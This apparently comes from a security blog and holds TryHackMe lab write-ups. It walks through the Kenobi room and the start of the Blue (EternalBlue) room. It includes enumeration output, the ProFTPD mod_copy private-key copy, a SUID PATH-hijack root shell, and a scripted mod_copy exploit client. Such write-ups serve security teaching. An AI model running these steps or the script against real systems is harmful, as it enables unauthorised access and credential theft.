An Electrical Engineer with a passion for Linux and Cyber Security.
https://breakbeforemake.tech (@C0gnitiveFl0w)

TryHackMe - Kenobi

[Task 1] Deploy the vulnerable machine

  • Set up a bash environment variable

    export IP=KENOBI-IP
    

    NOTE: where KENOBI-IP is shown throughout this writeup, this refers to the TryHackMe server IP.

  • Make sure there is a connection to the THM network

    ping $IP -c 3
    
    PING KENOBI-IP (KENOBI-IP) 56(84) bytes of data.
    64 bytes from KENOBI-IP: icmp_seq=1 ttl=63 time=43.3 ms
    64 bytes from KENOBI-IP: icmp_seq=2 ttl=63 time=43.9 ms
    64 bytes from KENOBI-IP: icmp_seq=3 ttl=63 time=43.1 ms
    
    --- KENOBI-IP ping statistics ---
    3 packets transmitted, 3 received, 0% packet loss, time 2003ms
    rtt min/avg/max/mdev = 43.110/43.424/43.878/0.328 ms
    
  • Scan the machine with nmap (run without root here, so nmap falls back to a TCP connect scan, as the output shows)

    nmap -sC -sV -vvv -oA $PWD/portScan/nmap-initial $IP
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:38 EDT
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    Initiating Ping Scan at 18:38
    Scanning KENOBI-IP [2 ports]
    Completed Ping Scan at 18:38, 0.04s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 18:38
    Completed Parallel DNS resolution of 1 host. at 18:38, 0.01s elapsed
    DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
    Initiating Connect Scan at 18:38
    Scanning KENOBI-IP [1000 ports]
    Discovered open port 21/tcp on KENOBI-IP
    Discovered open port 80/tcp on KENOBI-IP
    Discovered open port 139/tcp on KENOBI-IP
    Discovered open port 111/tcp on KENOBI-IP
    Discovered open port 22/tcp on KENOBI-IP
    Discovered open port 445/tcp on KENOBI-IP
    Discovered open port 2049/tcp on KENOBI-IP
    Completed Connect Scan at 18:38, 0.67s elapsed (1000 total ports)
    Initiating Service scan at 18:38
    Scanning 7 services on KENOBI-IP
    Completed Service scan at 18:38, 11.15s elapsed (7 services on 1 host)
    NSE: Script scanning KENOBI-IP.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 1.99s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.23s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    Nmap scan report for KENOBI-IP
    Host is up, received syn-ack (0.044s latency).
    Scanned at 2020-05-09 18:38:16 EDT for 14s
    Not shown: 993 closed ports
    Reason: 993 conn-refused
    PORT     STATE SERVICE     REASON  VERSION
    21/tcp   open  ftp         syn-ack ProFTPD 1.3.5
    22/tcp   open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
    |   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
    |   256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
    80/tcp   open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
    | http-methods:
    |_  Supported Methods: POST OPTIONS GET HEAD
    | http-robots.txt: 1 disallowed entry
    |_/admin.html
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    111/tcp  open  rpcbind     syn-ack 2-4 (RPC #100000)
    | rpcinfo:
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/tcp6  nfs
    |   100003  2,3,4       2049/udp   nfs
    |   100003  2,3,4       2049/udp6  nfs
    |   100005  1,2,3      34097/tcp   mountd
    |   100005  1,2,3      42895/udp6  mountd
    |   100005  1,2,3      49712/udp   mountd
    |   100005  1,2,3      54641/tcp6  mountd
    |   100021  1,3,4      38881/tcp   nlockmgr
    |   100021  1,3,4      42051/tcp6  nlockmgr
    |   100021  1,3,4      52158/udp   nlockmgr
    |   100021  1,3,4      59194/udp6  nlockmgr
    |   100227  2,3         2049/tcp   nfs_acl
    |   100227  2,3         2049/tcp6  nfs_acl
    |   100227  2,3         2049/udp   nfs_acl
    |_  100227  2,3         2049/udp6  nfs_acl
    139/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    2049/tcp open  nfs_acl     syn-ack 2-3 (RPC #100227)
    Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Host script results:
    |_clock-skew: mean: 9h38m02s, deviation: 2h53m12s, median: 7h58m01s
    | nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | Names:
    |   KENOBI<00>           Flags: <unique><active>
    |   KENOBI<03>           Flags: <unique><active>
    |   KENOBI<20>           Flags: <unique><active>
    |   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
    |   WORKGROUP<00>        Flags: <group><active>
    |   WORKGROUP<1d>        Flags: <unique><active>
    |   WORKGROUP<1e>        Flags: <group><active>
    | Statistics:
    |   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    |   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    |_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
    | p2p-conficker:
    |   Checking for Conficker.C or higher...
    |   Check 1 (port 33364/tcp): CLEAN (Couldn't connect)
    |   Check 2 (port 63681/tcp): CLEAN (Couldn't connect)
    |   Check 3 (port 58242/udp): CLEAN (Failed to receive data)
    |   Check 4 (port 4291/udp): CLEAN (Failed to receive data)
    |_  0/4 checks are positive: Host is CLEAN or ports are blocked
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: kenobi
    |   NetBIOS computer name: KENOBI\x00
    |   Domain name: \x00
    |   FQDN: kenobi
    |_  System time: 2020-05-10T01:36:31-05:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-05-10T06:36:31
    |_  start_date: N/A
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 18:38
    Completed NSE at 18:38, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds
    

    How many ports are open? The scan lists seven open TCP ports: 21, 22, 80, 111, 139, 445 and 2049.

    Answer = 7

[Task 2] Enumerating Samba for shares

  • Use nmap to enumerate a machine for SMB shares

    nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 18:40 EDT
    Nmap scan report for KENOBI-IP
    Host is up (0.042s latency).
    
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares:
    |   account_used: guest
    |   \\KENOBI-IP\IPC$:
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
    |     Users: 1
    |     Max Users: <unlimited>
    |     Path: C:\tmp
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\KENOBI-IP\anonymous:
    |     Type: STYPE_DISKTREE
    |     Comment:
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\home\kenobi\share
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\KENOBI-IP\print$:
    |     Type: STYPE_DISKTREE
    |     Comment: Printer Drivers
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\var\lib\samba\printers
    |     Anonymous access: <none>
    |_    Current user access: <none>
    |_smb-enum-users: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 6.74 seconds
    

    How many shares have been found?

    Answer = 3

  • List the files in the anonymous share (press enter at the password prompt, or pass -N, for a null session; the share allows anonymous READ/WRITE as the scan above showed)

    smbclient //KENOBI-IP/anonymous
    Enter WORKGROUP\c0g's password:
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Wed Sep  4 06:49:09 2019
      ..                                  D        0  Wed Sep  4 06:56:07 2019
      log.txt                             N    12237  Wed Sep  4 06:49:09 2019
    
                    9204224 blocks of size 1024. 6877104 blocks available
    

    What file can you see?

    Answer = log.txt

  • Recursively download the SMB share.

    smbget -R smb://KENOBI-IP/anonymous
    Password for [c0g] connecting to //anonymous/KENOBI-IP:
    Using workgroup WORKGROUP, user c0g
    smb://KENOBI-IP/anonymous/log.txt
    
    Downloaded 11.95kB in 3 seconds

    cat log.txt | grep port
    # Port 21 is the standard FTP port.
    # Don't use IPv6 support by default.
    #    behaviour of Samba but the option is considered important
    # Windows Internet Name Serving Support Section:
    # WINS Support - Tells the NMBD component of Samba to enable its WINS Server
    #   wins support = no
    # By default, the home directories are exported read-only. Change the
    

    What port is FTP running on? Answer = 21

  • Enumerate NFS exports through rpcbind on port 111

    nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 21:34 EDT
    Nmap scan report for KENOBI-IP
    Host is up (0.042s latency).
    
    PORT    STATE SERVICE
    111/tcp open  rpcbind
    | nfs-showmount:
    |_  /var *
    
    Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
    

    What mount can we see?

    Answer = /var

    The export line "/var *" means any host may mount it; there is no client address restriction, which is why the copy trick that follows can be collected from the attacking machine.

[Task 3] Gain initial access with ProFTPD

  • Use netcat to connect to the machine on the FTP port.

    netcat KENOBI-IP 21
    220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP ]
    
  • Use searchsploit to find exploits for ProFTPD

    searchsploit ProFTPD 1.3.5
    
    ---------------------------------------------- ---------------------------------
     Exploit Title                                |  Path
    ---------------------------------------------- ---------------------------------
    ProFTPd 1.3.5 - File Copy                     | linux/remote/36742.txt
    ProFTPd 1.3.5 - 'mod_copy' Command Execution  | linux/remote/37262.rb
    ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
    ---------------------------------------------- ---------------------------------
    Shellcodes: No Results
    Papers: No Results
    

    What is the version? Answer = 1.3.5

  • Copy Kenobi's private key using the SITE CPFR and SITE CPTO commands.

    ProFTPD 1.3.5's mod_copy module (CVE-2015-3306) accepts SITE CPFR (copy from) and SITE CPTO (copy to) without any login, and the daemon performs the copy itself, so any file it can read can be duplicated to any location it can write. The source is kenobi's key in its default location, /home/kenobi/.ssh/id_rsa; the destination is /var/tmp, because /var is the NFS export found earlier. The two commands typed, with the server's replies:

    netcat KENOBI-IP 21
    220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [KENOBI-IP]
    SITE CPFR /home/kenobi/.ssh/id_rsa
    350 File or directory exists, ready for destination name
    SITE CPTO /var/tmp/id_rsa
    250 Copy successful
    

    A 5xx reply at either step means the daemon cannot read the source or write the destination. Since /var is exported over NFS, the copy now sitting in /var/tmp can be read by mounting that export on the attacking machine.
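
    The CPFR/CPTO exchange above, scripted, as an added example that is not part of the original writeup. The client below speaks plain FTP over a socket and checks the reply code of each step, so it works unchanged against a real ProFTPD 1.3.5 on port 21. To make it runnable offline it also carries FakeProFTPD, a stand-in constructed for this example: its banner and the 350/250 replies are copied from the transcript, its other reply texts and its list of readable files are invented. The source path is kenobi's key in its default location and the destination is the /var/tmp used in this room.

```python
"""SITE CPFR / SITE CPTO against ProFTPD mod_copy (CVE-2015-3306).
Added example for this writeup, not code from the original post: the client
is plain FTP over a socket and works against a real ProFTPD 1.3.5; FakeProFTPD
is constructed so the exchange runs offline (its banner and 350/250 texts come
from the transcript above, its other replies are invented)."""
import socket
import threading


def read_reply(rfile):
    """Read one FTP reply (single or multi-line); return (code, text)."""
    line = rfile.readline()
    if not line:
        raise ConnectionError("server closed the control connection")
    code, text = int(line[:3]), [line[4:].rstrip("\r\n")]
    if line[3:4] == "-":                              # '123-' multi-line reply
        while not (line[:3] == str(code) and line[3:4] == " "):
            line = rfile.readline()
            if not line:
                raise ConnectionError("truncated multi-line reply")
            text.append(line[4:].rstrip("\r\n"))
    return code, "\n".join(text)


def site_copy(host, port, src, dst, timeout=5.0):
    """Have the daemon copy src to dst before any login. Returns the exchange
    as [(command, code, text), ...]; raises RuntimeError if a step is refused."""
    exchange = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rfile = sock.makefile("r", encoding="latin-1")
        exchange.append(("<banner>",) + read_reply(rfile))

        def send(cmd, expected):
            sock.sendall((cmd + "\r\n").encode("latin-1"))
            code, text = read_reply(rfile)
            exchange.append((cmd, code, text))
            if code != expected:
                raise RuntimeError(f"{cmd!r} refused: {code} {text}")

        send(f"SITE CPFR {src}", 350)   # daemon has opened the source
        send(f"SITE CPTO {dst}", 250)   # daemon writes the copy itself
        send("QUIT", 221)
    return exchange


class FakeProFTPD:
    """Constructed stand-in for the target's control channel: honours the two
    mod_copy commands for paths in `readable`, rejects everything else."""
    BANNER = "220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [127.0.0.1]"

    def __init__(self, readable):
        self.readable = set(readable)
        self.copies = []                 # (src, dst) pairs copied so far
        self._srv = socket.socket()
        self._srv.bind(("127.0.0.1", 0))
        self._srv.listen(5)
        self.port = self._srv.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            conn, _ = self._srv.accept()
            threading.Thread(target=self._session, args=(conn,), daemon=True).start()

    def _session(self, conn):
        pending = None                   # source named by the last CPFR
        with conn:
            rfile = conn.makefile("r", encoding="latin-1")
            reply = lambda s: conn.sendall((s + "\r\n").encode("latin-1"))
            reply(self.BANNER)
            for line in rfile:
                verb, _, arg = line.rstrip("\r\n").partition(" ")
                sub, _, path = arg.partition(" ")
                verb, sub = verb.upper(), sub.upper()
                if verb == "SITE" and sub == "CPFR":
                    if path in self.readable:
                        pending = path
                        reply("350 File or directory exists, ready for destination name")
                    else:
                        reply(f"550 {path}: No such file or directory")   # invented text
                elif verb == "SITE" and sub == "CPTO" and pending:
                    self.copies.append((pending, path))
                    self.readable.add(path)
                    pending = None
                    reply("250 Copy successful")
                elif verb == "QUIT":
                    reply("221 Goodbye.")
                    return
                else:
                    reply("500 Command not understood")                    # invented text


if __name__ == "__main__":
    fake = FakeProFTPD(readable={"/home/kenobi/.ssh/id_rsa"})
    for cmd, code, text in site_copy("127.0.0.1", fake.port,
                                     "/home/kenobi/.ssh/id_rsa", "/var/tmp/id_rsa"):
        print(f"{cmd:<36} {code} {text}")
```

    Run it as a script to see the four replies, or import site_copy and point it at the target. A RuntimeError carrying a 5xx reply is what you get when the daemon cannot read the source or write the destination, for instance when guessing a key path that does not exist; the fake server models that with its 550 reply.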

  • Mount the exported /var directory on the attacking machine

    sudo mkdir /mnt/kenobiNFS
    sudo mount KENOBI-IP:/var /mnt/kenobiNFS/
    ls -la /mnt/kenobiNFS/
    total 56
    drwxr-xr-x  14 root           root     4096 2019-09-04  2019 .
    drwxr-xr-x   3 root           root     4096 2020-05-09 22:06 ..
    drwxr-xr-x   2 root           root     4096 2019-09-04  2019 backups
    drwxr-xr-x   9 root           root     4096 2019-09-04  2019 cache
    drwxrwxrwt   2 root           root     4096 2019-09-04  2019 crash
    drwxr-xr-x  40 root           root     4096 2019-09-04  2019 lib
    drwxrwsr-x   2 root           staff    4096 2016-04-12  2016 local
    lrwxrwxrwx   1 root           root        9 2019-09-04  2019 lock -> /run/lock
    drwxrwxr-x  10 root           crontab  4096 2019-09-04  2019 log
    drwxrwsr-x   2 root           mail     4096 2019-02-26  2019 mail
    drwxr-xr-x   2 root           root     4096 2019-02-26  2019 opt
    lrwxrwxrwx   1 root           root        4 2019-09-04  2019 run -> /run
    drwxr-xr-x   2 root           root     4096 2019-01-29  2019 snap
    drwxr-xr-x   5 root           root     4096 2019-09-04  2019 spool
    drwxrwxrwt   6 root           root     4096 2020-05-10 05:49 tmp
    drwxr-xr-x   3 root           root     4096 2019-09-04  2019 www
    
  • Copy the private key out of the mounted /var/tmp and use it to log in to Kenobi's account

    cp /mnt/kenobiNFS/tmp/id_rsa .
    
    sudo chmod 600 id_rsa
    [sudo] password for c0g:
    
    ssh -i id_rsa kenobi@KENOBI-IP
    Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    103 packages can be updated.
    65 updates are security updates.
    
    Last login: Sun May 10 05:18:41 2020 from 10.11.1.193
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.
    
    cat /home/kenobi/user.txt | wc -c
    33
    

[Task 4] Privilege Escalation with Path Variable Manipulation

  • Search the system for SUID files

    kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
    /sbin/mount.nfs
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/snapd/snap-confine
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/bin/chfn
    /usr/bin/newgidmap
    /usr/bin/pkexec
    /usr/bin/passwd
    /usr/bin/newuidmap
    /usr/bin/gpasswd
    /usr/bin/menu
    /usr/bin/sudo
    /usr/bin/chsh
    /usr/bin/at
    /usr/bin/newgrp
    /bin/umount
    /bin/fusermount
    /bin/mount
    /bin/ping
    /bin/su
    /bin/ping6
    kenobi@kenobi:~$
    

What file looks particularly out of the ordinary?

Answer = /usr/bin/menu

  • Run the binary

    kenobi@kenobi:~$ menu
    
    ***************************************
    1. status check
    2. kernel version
    3. ifconfig
     Enter your choice :
    

How many options appear? Answer = 3

  • Use strings to look for anything human readable within the binary

    kenobi@kenobi:~$ strings /usr/bin/menu
    /lib64/ld-linux-x86-64.so.2
    libc.so.6
    setuid
    __isoc99_scanf
    puts
    __stack_chk_fail
    printf
    system
    __libc_start_main
    __gmon_start__
    GLIBC_2.7
    GLIBC_2.4
    GLIBC_2.2.5
    UH-
    AWAVA
    AUATL
    []A\A]A^A_
     ***************************************
    1. status check
    2. kernel version
    3. ifconfig
     ** Enter your choice :
    curl -I localhost
    uname -r
    ifconfig
    .........
    output shortened
    

    The command strings the menu runs (curl -I localhost, uname -r, ifconfig) name their programs without a path, not as /usr/bin/curl and so on, and the imported symbols include setuid and system. Each choice is therefore handed to a shell via system(), which looks the program up through whatever PATH the caller supplied.

    Because /usr/bin/menu is SUID root and calls setuid() before system(), the first file named curl found on PATH runs as root. Putting a file called curl that starts /bin/sh in a directory we control and prepending that directory to PATH gives a root shell. (chmod +x is enough; 777 is not needed. The id output shows uid=0 but kenobi's gid, since the binary calls setuid but not setgid.)

    kenobi@kenobi:~$ cd /tmp
    kenobi@kenobi:/tmp$ echo /bin/sh > curl
    kenobi@kenobi:/tmp$ chmod 777 curl
    kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
    kenobi@kenobi:/tmp$ /usr/bin/menu
    
     ***************************************
    1. status check
    2. kernel version
    3. ifconfig
     ** Enter your choice :1
    # id
    uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
    kenobi@kenobi:/tmp$ cat /root/root.txt | wc -c
    33
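
    Why the hijack works, shown in code as an added example; this is not the source of /usr/bin/menu, which the post does not include. The script takes the three command strings from the strings output above, flags the ones that name their program without a path, plants a fake curl in a temporary directory, and shows what a system()-style invocation (/bin/sh -c) resolves and runs under an attacker-prefixed PATH versus a fixed one. It runs as the current user; the fake curl, the temporary directory and the SAFE_PATH value are constructed for the example. The SUID bit on menu is what turns the same resolution into root on Kenobi.

```python
"""PATH hijack of a command that is run by bare name, and the fix.

Added example for this writeup, not the source of /usr/bin/menu (which the
post does not include). STRINGS_OUTPUT is the three command strings from
`strings /usr/bin/menu` above; the fake curl, the temporary directory and
SAFE_PATH are constructed for the demo. Everything runs as the current user:
the example shows which curl gets executed, the SUID bit on menu is what makes
that curl run as root on Kenobi."""
import os
import shutil
import stat
import subprocess
import tempfile

STRINGS_OUTPUT = """\
curl -I localhost
uname -r
ifconfig
"""

# Fixed search path a SUID program should set for itself instead of trusting
# the one it inherited (constructed; matches a stock Ubuntu default).
SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def bare_commands(strings_output):
    """Command lines whose program is named without a directory, i.e. ones
    the shell will look up through PATH."""
    bare = []
    for line in strings_output.splitlines():
        words = line.split()
        if words and "/" not in words[0]:
            bare.append(line.strip())
    return bare


def writable_path_dirs(path_value):
    """Directories in a PATH value the current user can write to: any of
    these ahead of the real binary lets the user plant a lookalike."""
    return [d for d in path_value.split(os.pathsep)
            if d and os.path.isdir(d) and os.access(d, os.W_OK)]


def plant_fake(dirpath, name):
    """Drop an executable `name` into dirpath. On Kenobi the file held
    '/bin/sh'; here it only reports that it ran, so the demo is harmless."""
    path = os.path.join(dirpath, name)
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho HIJACKED $0\n")
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)
    return path


def run_like_system(command, path_value):
    """Execute `command` the way libc's system() does, /bin/sh -c, with PATH
    set to path_value; returns stdout."""
    done = subprocess.run(["/bin/sh", "-c", command], env={"PATH": path_value},
                          capture_output=True, text=True)
    return done.stdout.strip()


def demo():
    """Resolve and run 'curl' under an attacker-prefixed PATH and under
    SAFE_PATH; returns the observations as a dict."""
    with tempfile.TemporaryDirectory() as tmp:
        fake = plant_fake(tmp, "curl")
        attacker_path = tmp + os.pathsep + SAFE_PATH   # export PATH=/tmp:$PATH
        return {
            "fake": fake,
            "writable_dirs": writable_path_dirs(attacker_path),
            "hijacked_resolves_to": shutil.which("curl", path=attacker_path),
            "hijacked_output": run_like_system("curl -I localhost", attacker_path),
            # the fix: a fixed PATH (or an absolute /usr/bin/curl) never
            # consults the attacker's directory
            "fixed_resolves_to": shutil.which("curl", path=SAFE_PATH),
        }


if __name__ == "__main__":
    print("PATH-resolved commands in menu:", bare_commands(STRINGS_OUTPUT))
    for key, value in demo().items():
        print(f"{key}: {value}")
```

    The fixed-PATH half is the hardening a SUID program needs: set PATH to a known value before calling system(), or call /usr/bin/curl by absolute path, and the directory the user controls is never consulted. writable_path_dirs is the quick audit for the attacker's side of the condition: any writable directory listed before the real binary's location is enough.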
    

TryHackMe - Blue

Prerequisite

$ export IP=THM_VPN_IP

TASK 1 - RECON

1. Scan the machine

The command below runs the scan and writes the results in all output formats (-oA) into a portScan directory.

$ sudo nmap -sC -sV -vvv -oA ./portScan/nmap-initial $IP
Nmap scan report for 10.10.0.135
Host is up, received echo-reply ttl 127 (0.050s latency).
Scanned at 2020-04-12 12:48:35 BST for 137s
Not shown: 991 closed ports
Reason: 991 resets
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped   syn-ack ttl 127
|_ssl-date: 2020-04-12T11:49:53+00:00; +1s from scanner time.
49152/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h15m01s, deviation: 2h30m00s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:09:52:93:bf:3a (unknown)
| Names:
|   JON-PC<00>           Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   JON-PC<20>           Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   02 09 52 93 bf 3a 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 62444/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 34185/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 22744/udp): CLEAN (Timeout)
|   Check 4 (port 44981/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-04-12T06:49:38-05:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-12T11:49:38
|_  start_date: 2020-04-12T09:42:45
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 12:50:52 2020 -- 1 IP address (1 host up) scanned in 137.96 seconds

2. How many ports are open with a port number under 1000?

135/tcp
139/tcp
445/tcp

The correct answer for this question was 3.

3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

As the machine is called Blue, it was safe to assume the intended vulnerability is EternalBlue. The scan backs this up: Windows 7 Professional 7601 Service Pack 1 with SMB exposed on 445. It can be confirmed without exploiting anything with the auxiliary/scanner/smb/smb_ms17_010 module (the exploit module runs the same check before firing, as seen in Task 2). In the requested format the answer is:

ms17-010

TASK 2 - GAIN ACCESS

1. Start Metasploit

$ sudo msfdb run

2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........).

Within metasploit we search for eternal blue to identify all the matching modules.

msf5 > search eternalblue
Matching Modules
================
   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
